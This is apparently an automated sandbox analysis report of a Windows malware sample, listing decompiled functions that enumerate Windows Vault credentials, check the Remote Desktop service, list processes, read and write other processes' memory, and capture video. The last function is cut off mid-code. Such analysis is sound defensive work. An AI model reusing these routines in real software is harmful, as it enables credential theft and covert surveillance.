0x010448a6
0x010448a6
0x010448a9
0x010448b3
0x010448b3
0x01044739
0x0104473b
0x01044740
0x00000000
0x00000000
0x01044749
0x01044752
0x0104475a
0x00000000
0x00000000
0x01044771
0x01044773
0x01044778
0x01044789
0x0104478c
0x0104479a
0x010447a7
0x010447b1
0x010447c3
0x010447c6
0x010447c7
0x010447c8
0x010447d1
0x010447d2
0x010447d3
0x010447d4
0x010447d7
0x010447dd
0x010447e2
0x010447e6
0x010447eb
0x010447f0
0x010447f4
0x010447f6
0x010447fe
0x01044803
0x01044805
0x01044812
0x01044815
0x0104481d
0x0104482a
0x01044838
0x0104484c
0x0104484c
0x01044803
0x010447f4
0x010447e6
0x00000000

APIs

CoInitialize.OLE32(00000000), ref: 010446F3
CoCreateInstance.OLE32(010475C0,00000000,00000001,0104A79C,01044222), ref: 01044720
CoUninitialize.OLE32 ref: 010448A9

Part of subcall function 01044A12: CoCreateInstance.OLE32(01047600,00000000,00000001,0104A77C,?,748CB690,00000000,00000000,?,?,01044757), ref: 01044A40

CoCreateInstance.OLE32(01047610,00000000,00000001,0104A78C,?), ref: 01044771

Part of subcall function 01044492: CoTaskMemFree.OLE32(?,?,00000000,0104483D), ref: 010444A0

Strings

vids, xrefs: 010447AC
Source, xrefs: 01044780
Grabber, xrefs: 0104478F

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CreateInstance$FreeInitializeTaskUninitialize
String ID: Grabber$Source$vids
API String ID: 533512943-4200688928
Opcode ID: 4657a95201e1b562cba12902a77c1acef83d223239fd8ff0ba053ae6b9e90a5d
Instruction ID: 9aef8e6890d79d1828d91eb1c26d2c2531bc6e9eb2961faa87428a0c1837e253
Opcode Fuzzy Hash: 4657a95201e1b562cba12902a77c1acef83d223239fd8ff0ba053ae6b9e90a5d
Instruction Fuzzy Hash: F7510EB1A00209AFEB14DFA5C8C8FAEBBB9FF44705F1484ADE955EB250C7B19905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0103ACBE Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54
libraryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0103ACBE(void* __ecx) {
				struct HINSTANCE__* _t17;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t27;
				void* _t45;

				_t27 = __ecx;
				_t45 = __ecx;
				_t17 = LoadLibraryA("vaultcli.dll");
				 *(_t45 + 0xc0) = _t17;
				_t46 = _t17;
				if(_t17 == 0) {
					L7:
					__eflags = 0;
					return 0;
				} else {
					_push(_t27);
					 *((intOrPtr*)(_t45 + 0x8c)) = E01041E88(_t17, "VaultOpenVault", _t46);
					 *((intOrPtr*)(_t45 + 0x90)) = E01041E88( *(_t45 + 0xc0), "VaultCloseVault", _t46);
					_t21 = E01041E88( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
					_t43 = "VaultGetItem";
					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
					 *((intOrPtr*)(_t45 + 0x98)) = E01041E88( *(_t45 + 0xc0), "VaultGetItem", _t46);
					 *((intOrPtr*)(_t45 + 0x9c)) = E01041E88( *(_t45 + 0xc0), _t43, _t46);
					_t24 = E01041E88( *(_t45 + 0xc0), "VaultFree", _t46);
					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
						goto L7;
					} else {
						return 1;
					}
				}
			}

0x0103acbe
0x0103acc4
0x0103acc6
0x0103accc
0x0103acd2
0x0103acd4
0x0103ad88
0x0103ad88
0x0103ad8b
0x0103acda
0x0103acdb
0x0103acf3
0x0103ad09
0x0103ad0f
0x0103ad1a
0x0103ad21
0x0103ad34
0x0103ad4a
0x0103ad50
0x0103ad58
0x0103ad65
0x00000000
0x0103ad83
0x0103ad87
0x0103ad87
0x0103ad65

APIs

LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0103A98E), ref: 0103ACC6

Part of subcall function 01041E88: lstrcmpA.KERNEL32(?,01043251,?,open,01043251), ref: 01041EC1

Strings

VaultCloseVault, xrefs: 0103ACEE
VaultEnumerateItems, xrefs: 0103AD04
VaultOpenVault, xrefs: 0103ACDC
VaultFree, xrefs: 0103AD45
VaultGetItem, xrefs: 0103AD1A
vaultcli.dll, xrefs: 0103ACBF

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: LibraryLoadlstrcmp
String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2493137890-3967309459
Opcode ID: 452a1a6c245ab51ede394dc5960a8f74219bb894770cff5f75c337b57337a24c
Instruction ID: 0c22f25bbd58db40c818a049e0b133d014ad2cad26ac771a576b4126ff142cb3
Opcode Fuzzy Hash: 452a1a6c245ab51ede394dc5960a8f74219bb894770cff5f75c337b57337a24c
Instruction Fuzzy Hash: E3113DB9A01701CBE734AB759894B9BB7E9BF95241F448D3E84DB87340DA34A842CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0103EFC1 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41
serviceCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0103EFC1(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				char _v12;
				char* _t8;
				void* _t11;
				void* _t16;
				short* _t19;

				_t19 = 0;
				_v8 = __edx;
				_t16 = OpenSCManagerW(0, L"ServicesActive", 1);
				if(_t16 != 0) {
					_t11 = OpenServiceW(_t16, L"TermService", 4);
					if(_t11 != 0) {
						_t8 =  &_v12;
						__imp__QueryServiceStatusEx(_t11, 0, _v8, 0x24, _t8);
						_t19 = _t8;
						CloseServiceHandle(_t11);
					}
					CloseServiceHandle(_t16);
				}
				return _t19;
			}

0x0103efcf
0x0103efd1
0x0103efdb
0x0103efdf
0x0103eff0
0x0103eff4
0x0103eff6
0x0103f001
0x0103f008
0x0103f00a
0x0103f00a
0x0103f011
0x0103f017
0x0103f01d

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,00000000,?,?,?,0103E78B), ref: 0103EFD5
OpenServiceW.ADVAPI32(00000000,TermService,00000004,?,?,?,?,0103E78B), ref: 0103EFEA
QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,?,?,?,0103E78B), ref: 0103F001
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0103E78B), ref: 0103F00A
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0103E78B), ref: 0103F011

Strings

ServicesActive, xrefs: 0103EFCA
TermService, xrefs: 0103EFE4

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpen$ManagerQueryStatus
String ID: ServicesActive$TermService
API String ID: 2623946379-1374911754
Opcode ID: 98001160ebe6c563fc99f07f607f484d003ab6fcdacc0d22b373809b16b05b46
Instruction ID: b556970273212e669256048025d3a832dbe0104ac0b7eda7d50687060a093feb
Opcode Fuzzy Hash: 98001160ebe6c563fc99f07f607f484d003ab6fcdacc0d22b373809b16b05b46
Instruction Fuzzy Hash: AAF0BBBE641211FBE73047A9AECDEABBAACDB88754B000164F74192104D7B6990097A0

Uniqueness

Uniqueness Score: -1.00%

Function 01035DE9 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E01035DE9(void* __ecx) {
				_Unknown_base(*)()* _t2;
				void* _t4;

				_t4 = __ecx;
				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t4 == 0) {
					if(_t2 != 0) {
						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
					}
					ExitProcess(1);
				}
				return _t2;
			}

0x01035def
0x01035dfd
0x01035e06
0x01035e0a
0x01035e1d
0x01035e1d
0x01035e21
0x01035e21
0x01035e27

APIs

LoadLibraryA.KERNEL32(USER32.DLL,?,01041800,?,76B30770,00000000), ref: 01035DF1
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 01035DFD
ExitProcess.KERNEL32 ref: 01035E21

Strings

USER32.DLL, xrefs: 01035DEA
Assert, xrefs: 01035E11
An assertion condition failed, xrefs: 01035E16
MessageBoxA, xrefs: 01035DF7

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcProcess
String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
API String ID: 881411216-1361702557
Opcode ID: 612bc70c7eae3cff79d8e7568258be27a53793ed9ac43f52d8a653245b2aa64a
Instruction ID: 737b798b92f9337b414314700c1b7b53a1349dd064596c38209c4f49b19415fb
Opcode Fuzzy Hash: 612bc70c7eae3cff79d8e7568258be27a53793ed9ac43f52d8a653245b2aa64a
Instruction Fuzzy Hash: BAD05EF47C13003FFA6026726ECEF5636588B84F51F0404ADBAC199097CBA6C044C670

Uniqueness

Uniqueness Score: -1.00%

Function 010360B0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E010360B0() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t2 != 0) {
					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
				}
				ExitProcess(1);
			}

0x010360c1
0x010360c9
0x010360dc
0x010360dc
0x010360e0

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 010360B5
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 010360C1
ExitProcess.KERNEL32 ref: 010360E0

Strings

USER32.DLL, xrefs: 010360B0
PureCall, xrefs: 010360D0
A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 010360D5
MessageBoxA, xrefs: 010360BB

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcProcess
String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
API String ID: 881411216-4134947204
Opcode ID: ac055e97493eb1276ea954cf117c1ce827ccbbedd0734db24a69eff45133d518
Instruction ID: 61dc53968c65dbf4871fb522993fe3250b5ae835b1de20b6a564faa16963dd88
Opcode Fuzzy Hash: ac055e97493eb1276ea954cf117c1ce827ccbbedd0734db24a69eff45133d518
Instruction Fuzzy Hash: 7FD0C9F43C03007BF2202BA2AECFF1639155B44F01F00087CB6C1E8086CBE6D150D665

Uniqueness

Uniqueness Score: -1.00%

Function 010422CA Relevance: 12.2, APIs: 8, Instructions: 164
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E010422CA(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				int _v36;
				intOrPtr _v40;
				int _v44;
				char _v568;
				long _v596;
				char _v600;
				void* _v604;
				char _v1644;
				intOrPtr _t49;
				int _t54;
				int _t58;
				int _t74;
				int _t78;
				int _t90;
				void* _t92;
				void* _t113;
				void* _t114;
				void* _t116;
				void* _t118;
				signed int _t120;
				void* _t121;
				signed int _t123;
				void* _t124;
				intOrPtr* _t125;
				void* _t126;

				_t126 = __eflags;
				_t113 = __edx;
				_t92 = __ecx;
				E01031052( &_v600, 0, 0x228);
				_t125 = _t124 + 0xc;
				_v604 = 0x22c;
				_v36 = 0;
				_t49 = 5;
				_v32 = _t49;
				_v40 = _t49;
				E01031735( &_v44, _t126);
				_t114 = CreateToolhelp32Snapshot(2, 0);
				if(_t114 == 0xffffffff) {
					L14:
					E0103136C(_t92, __eflags,  &_v44);
					_t54 = _v44;
					__eflags = _t54;
					if(_t54 != 0) {
						_t120 =  *(_t54 - 4);
						_t116 = _t120 * 0xc + _t54;
						__eflags = _t120;
						if(_t120 != 0) {
							do {
								_t116 = _t116 - 0xc;
								E01031468(_t116);
								_t120 = _t120 - 1;
								__eflags = _t120;
							} while (_t120 != 0);
						}
					}
				} else {
					_push( &_v604);
					_t58 = Process32FirstW(_t114);
					_t128 = _t58;
					if(_t58 != 0) {
						do {
							_v16 = _v596;
							_v12 = 0;
							_v8 = 0;
							E01033411( &_v12, _t113,  &_v568);
							_t121 = OpenProcess(0x1410, 0, _v596);
							__eflags = _t121 - 0xffffffff;
							if(_t121 == 0xffffffff) {
								E01033549( &_v8, E010336F7( &_v28, "-"));
								E01035FEB(_v28);
								_t34 =  &_v28;
								 *_t34 = _v28 & 0x00000000;
								__eflags =  *_t34;
							} else {
								E01031052( &_v1644, 0, 0x410);
								_t125 = _t125 + 0xc;
								_t78 =  &_v1644;
								__imp__GetModuleFileNameExW(_t121, 0, _t78, 0x208);
								__eflags = _t78;
								if(_t78 == 0) {
									E01033549( &_v8, E010336F7( &_v24, "-"));
									E01035FEB(_v24);
									_t29 =  &_v24;
									 *_t29 = _v24 & 0x00000000;
									__eflags =  *_t29;
								} else {
									E01033549( &_v8, E010336F7( &_v20,  &_v1644));
									E01035FEB(_v20);
									_v20 = _v20 & 0x00000000;
								}
								CloseHandle(_t121);
							}
							_t125 = _t125 - 0xc;
							_t122 = _t125;
							 *_t125 = _v16;
							E0103373F(_t122 + 4,  &_v12);
							E0103373F(_t122 + 8,  &_v8);
							E01031612( &_v44);
							E01031468( &_v16);
							_t74 = Process32NextW(_t114,  &_v604);
							_push(0);
							_pop(0);
							__eflags = _t74;
						} while (__eflags != 0);
						CloseHandle(_t114);
						goto L14;
					} else {
						CloseHandle(_t114);
						E0103136C(_t92, _t128,  &_v44);
						_t90 = _v44;
						if(_t90 != 0) {
							_t123 =  *(_t90 - 4);
							_t118 = _t123 * 0xc + _t90;
							if(_t123 != 0) {
								do {
									_t118 = _t118 - 0xc;
									E01031468(_t118);
									_t123 = _t123 - 1;
								} while (_t123 != 0);
							}
						}
					}
				}
				return _t92;
			}

0x010422ca
0x010422ca
0x010422e5
0x010422e7
0x010422ec
0x010422ef
0x010422fc
0x01042301
0x01042302
0x01042305
0x01042308
0x01042316
0x0104231b
0x010424a3
0x010424a9
0x010424ae
0x010424b1
0x010424b3
0x010424b5
0x010424bb
0x010424bd
0x010424bf
0x010424c1
0x010424c1
0x010424c6
0x010424cb
0x010424cb
0x010424cb
0x010424c1
0x010424bf
0x01042321
0x01042327
0x01042329
0x0104232f
0x01042331
0x01042374
0x0104237d
0x01042387
0x0104238a
0x0104238d
0x010423a4
0x010423a6
0x010423a9
0x01042440
0x01042448
0x0104244d
0x0104244d
0x0104244d
0x010423af
0x010423bd
0x010423c2
0x010423c5
0x010423d4
0x010423da
0x010423dc
0x01042415
0x0104241d
0x01042422
0x01042422
0x01042422
0x010423de
0x010423f1
0x010423f9
0x010423fe
0x010423fe
0x01042427
0x01042427
0x01042454
0x01042457
0x01042459
0x01042462
0x0104246e
0x01042476
0x0104247e
0x0104248b
0x01042491
0x01042493
0x01042494
0x01042494
0x0104249d
0x00000000
0x01042333
0x01042334
0x01042340
0x01042345
0x0104234a
0x01042350
0x01042356
0x0104235a
0x01042360
0x01042360
0x01042365
0x0104236a
0x0104236a
0x0104236f
0x0104235a
0x0104234a
0x01042331
0x010424d6

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01042310
Process32FirstW.KERNEL32(00000000,0000022C), ref: 01042329
CloseHandle.KERNEL32(00000000), ref: 01042334

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0104239E
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 010423D4
CloseHandle.KERNEL32(00000000,00000000,01047BA4), ref: 01042427
Process32NextW.KERNEL32(00000000,0000022C), ref: 0104248B
CloseHandle.KERNEL32(00000000), ref: 0104249D

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CloseHandle$Process32lstrlen$CreateDispatcherExceptionFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32UserVirtuallstrcpy
String ID:
API String ID: 1221420079-0
Opcode ID: da36da1fe95460424af1b6e9cee6d6fcb56e8cb1e0767ce5a457b24b8cf6dc28
Instruction ID: 948608484091f6ca674b45ed04682b4c6d8e4caa72a7819c768dd2a0c29c2eb2
Opcode Fuzzy Hash: da36da1fe95460424af1b6e9cee6d6fcb56e8cb1e0767ce5a457b24b8cf6dc28
Instruction Fuzzy Hash: A151B8B2E0111A9BCB10EBA4DDC9EEE7BBCAF94714F0001A5F585B7180DF749A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0103EE24 Relevance: 12.1, APIs: 8, Instructions: 126
filememoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103EE24(long* __ecx, void** __edx, long _a4) {
				long _v8;
				intOrPtr _v12;
				LONG* _v16;
				void* _t30;
				void _t32;
				void* _t35;
				int _t37;
				void* _t44;
				void* _t46;
				void* _t52;
				long _t62;
				void* _t63;
				struct _OVERLAPPED* _t74;

				_t60 = __ecx;
				_v12 = 0x1056970;
				_t74 = 0;
				_v16 = 0;
				_t62 = __ecx[1];
				_t72 = __edx;
				_t30 =  *_t62;
				if(_t30 == 0) {
					_t20 =  &(_t72[1]); // 0xf8858b49
					_t63 =  *_t20;
					_t32 =  *_t63;
					if(_t32 == 0) {
						E0103102C( *__ecx,  *__edx, _a4);
						_t74 = 1;
						L22:
						return _t74;
					}
					_t35 = _t32 - 1;
					if(_t35 == 0) {
						_t37 = ReadProcessMemory( *( *(_t63 + 4)),  *__edx,  *__ecx, _a4, 0);
						L8:
						_t74 = _t37;
						goto L22;
					}
					if(_t35 != 5 || SetFilePointer( *( *(_t63 + 4)),  *__edx, 0, 0) == 0xffffffff) {
						goto L22;
					} else {
						_t23 =  &(_t72[1]); // 0xf8858b49
						_t37 = ReadFile( *( *( *_t23 + 4)),  *_t60, _a4,  &_v8, 0);
						goto L8;
					}
				}
				_t44 = _t30 - 1;
				if(_t44 == 0) {
					_t10 =  &(_t72[1]); // 0xf8858b49
					if( *( *_t10) != 0) {
						L11:
						_t46 = LocalAlloc(0x40, _a4);
						_v16 = _t46;
						if(_t46 != 0) {
							if(E0103EE24( &_v16, _t72, _a4) != 0) {
								_t74 = E0103EE24(_t60,  &_v16, _a4);
							}
							LocalFree(_v16);
						}
						goto L22;
					}
					_t37 = WriteProcessMemory( *( *(_t62 + 4)),  *__ecx,  *__edx, _a4, 0);
					goto L8;
				}
				_t52 = _t44;
				if(_t52 == 0) {
					goto L11;
				}
				if(_t52 != 3) {
					goto L22;
				}
				_t4 =  &(_t72[1]); // 0xf8858b49
				if( *( *_t4) != 0) {
					goto L11;
				}
				if( *__ecx == 0 || SetFilePointer( *( *(_t62 + 4)),  *__ecx, 0, 0) != 0) {
					_t37 = WriteFile( *( *(_t60[1] + 4)),  *_t72, _a4,  &_v8, _t74);
					goto L8;
				} else {
					goto L22;
				}
			}

0x0103ee2b
0x0103ee2d
0x0103ee35
0x0103ee37
0x0103ee3a
0x0103ee3e
0x0103ee42
0x0103ee44
0x0103eefe
0x0103eefe
0x0103ef03
0x0103ef05
0x0103ef61
0x0103ef6b
0x0103ef6c
0x0103ef72
0x0103ef72
0x0103ef07
0x0103ef0a
0x0103ef4f
0x0103ee98
0x0103ee98
0x00000000
0x0103ee98
0x0103ef0f
0x00000000
0x0103ef25
0x0103ef2a
0x0103ef37
0x00000000
0x0103ef37
0x0103ef0f
0x0103ee4a
0x0103ee4d
0x0103ee9f
0x0103eea4
0x0103eebb
0x0103eec0
0x0103eec6
0x0103eecb
0x0103eee1
0x0103eef1
0x0103eef1
0x0103eef6
0x0103eef6
0x00000000
0x0103eecb
0x0103eeb3
0x00000000
0x0103eeb3
0x0103ee50
0x0103ee53
0x00000000
0x00000000
0x0103ee58
0x00000000
0x00000000
0x0103ee5e
0x0103ee63
0x00000000
0x00000000
0x0103ee67
0x0103ee92
0x00000000
0x00000000
0x00000000
0x00000000

APIs

SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0103EE72
WriteFile.KERNEL32(?,0103EC60,01056970,00000150,00000000,?,00000000,00000000), ref: 0103EE92
WriteProcessMemory.KERNEL32(?,?,0103EC60,01056970,00000000,?,00000000,00000000), ref: 0103EEB3
LocalAlloc.KERNEL32(00000040,01056970,?,00000000,00000000), ref: 0103EEC0
LocalFree.KERNEL32(?), ref: 0103EEF6
SetFilePointer.KERNEL32(?,0103EC60,00000000,00000000,?,00000000,00000000), ref: 0103EF1A
ReadFile.KERNEL32(?,?,01056970,00000150,00000000), ref: 0103EF37
ReadProcessMemory.KERNEL32(?,0103EC60,?,01056970,00000000,?,00000000,00000000), ref: 0103EF4F

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: File$LocalMemoryPointerProcessReadWrite$AllocFree
String ID:
API String ID: 3276737649-0
Opcode ID: 3d5c53e4d66f5a89ca277ab3286de4daa987980dd73f71c8070aa733b14c4b6a
Instruction ID: fdf9ae7b351f0a8ae9accb113cc3d5631b7a08794aac661588e0d02dc1dfe93e
Opcode Fuzzy Hash: 3d5c53e4d66f5a89ca277ab3286de4daa987980dd73f71c8070aa733b14c4b6a
Instruction Fuzzy Hash: B7413C3A500015FFCB229FA8D98489ABFFAFF4A3507148290FA85DA165D732D920DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0104046E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 192
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0104046E(intOrPtr __ecx) {
				char _v5;
				char _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				signed int _v36;
				long _v40;
				char _v49;
				char _v52;
				intOrPtr _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v100;
				char _v2156;
				void* _t61;
				char _t64;
				intOrPtr _t70;
				signed int _t77;
				void* _t87;
				void* _t95;
				void* _t99;
				signed int _t100;
				signed int _t102;
				void* _t111;
				signed int _t115;
				void* _t119;
				intOrPtr _t123;
				void* _t133;
				void* _t134;
				void* _t137;

				 *0x1189cac = __ecx;
				while(1) {
					_t61 = E0104075C( &_v100);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *0x1056755 == 0) {
						break;
					}
					_t99 = 0xc;
					_v5 = 0;
					_t95 = E01036099(_t99);
					if(_t95 == 0) {
						_t95 = 0;
					} else {
						asm("stosd");
						asm("stosd");
						asm("stosd");
					}
					_t100 = _v32;
					_t3 = 0x1056980 + _t100 * 0xc; // 0x1056980
					_t119 = _t3;
					if( *_t119 != _t100) {
						_t64 = _v5;
					} else {
						_t64 = 1;
						_t95 = _t119;
					}
					if(_t64 != 0) {
						if( *((char*)(_t95 + 4)) != 1) {
							_t130 = _v24;
							__imp__#19( *(_t95 + 8), _v24, _v28, 0);
						} else {
							E01031052( &_v2156, 0, 0x802);
							_v20 = _v20 & 0;
							_v16 = _v16 & 0;
							_t102 = 8;
							memset( &_v84, 0, _t102 << 2);
							_t137 = _t137 + 0x18;
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_t123 = _v24;
							_t70 =  *((intOrPtr*)(_t123 + 3));
							if(_t70 != 1) {
								if(_t70 != 3) {
									if(_t70 == 4) {
										__imp__InetNtopW(0x17, _t123 + 4,  &_v2156, 0x802);
										_t77 = E0104085B(_t123 + 4,  *(_t123 + 8) & 0x0000ffff);
										goto L18;
									}
								} else {
									E01031052( &_v84, 0, 0x20);
									_v80 = 2;
									_v76 = 1;
									_v72 = 6;
									_t133 = E01031085(0x200);
